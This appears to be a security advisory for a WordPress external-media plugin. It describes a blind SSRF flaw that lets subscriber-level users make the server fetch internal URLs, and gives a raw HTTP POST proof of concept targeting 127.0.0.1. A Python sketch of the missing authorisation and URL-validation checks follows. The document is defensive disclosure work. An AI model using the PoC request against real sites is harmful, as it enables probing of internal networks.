The plugin does not have any authorisation check and does not ensure that media added via URLs are external, which could allow any authenticated user, such as a subscriber, to perform blind SSRF attacks.
Put an internal URL such as http://127.0.0.1:8080 in the "Add medias from URLs" feature of the plugin (/wp-admin/upload.php?page=add-external-media-without-import):

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

urls=http%3A%2F%2F127.0.0.1%3A8080%2Fyolo&width=&height=&mime-type=&action=add_external_media_without_import
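The two controls the advisory says are missing, a capability check and an "is this URL really external" check, as an added illustration that is not the plugin's own code (the plugin is PHP; this is a language-neutral sketch in Python). The resolver table, hostnames and the 'upload_files' capability set are constructed for the example; only the URL from the PoC above is taken from the page.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS answers so the example runs offline (no host is contacted).
SAMPLE_DNS = {
    "cdn.example.org": ["93.184.216.34"],             # sample public address
    "rebind.example.net": ["93.184.216.34", "10.0.0.5"],  # mixed answer: reject
    "localtest.example": ["127.0.0.1"],               # public name, internal IP
}

def resolve(host):
    """Real resolver: every A/AAAA answer for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def sample_resolver(host):
    """Offline stand-in for resolve(); unknown names behave like NXDOMAIN."""
    if host not in SAMPLE_DNS:
        raise socket.gaierror(f"constructed NXDOMAIN for {host}")
    return SAMPLE_DNS[host]

def is_external_media_url(url, resolver=resolve):
    """True only for http(s) URLs whose every resolved address is public.
    Loopback, RFC 1918/ULA, link-local, reserved, multicast and unspecified
    addresses are rejected, as is any name with even one internal answer.
    Note: a check before the fetch is still racy against DNS rebinding; the
    fetch itself must connect to the address validated here, not re-resolve."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addrs = [ipaddress.ip_address(parts.hostname)]   # IP literal, incl. [::1]
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
        except (socket.gaierror, ValueError):
            return False
    if not addrs:
        return False
    return all(a.is_global for a in addrs)

def handle_add_external_media(user_caps, urls, resolver=resolve):
    """Handler logic: authorise first, then validate every submitted URL.
    'upload_files' is the WordPress capability subscribers do not hold."""
    if "upload_files" not in user_caps:
        return "forbidden"
    rejected = [u for u in urls if not is_external_media_url(u, resolver)]
    return "rejected:" + ",".join(rejected) if rejected else "accepted"
```

In a WordPress plugin the same two steps map onto current_user_can('upload_files') and fetching through wp_safe_remote_get(), which applies wp_http_validate_url() to refuse internal addresses.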
Luan Pedersini
IBLISS Digital Security
Yes
2022-04-19 (about 2 months ago)
2022-04-19 (about 2 months ago)
2022-04-20 (about 2 months ago)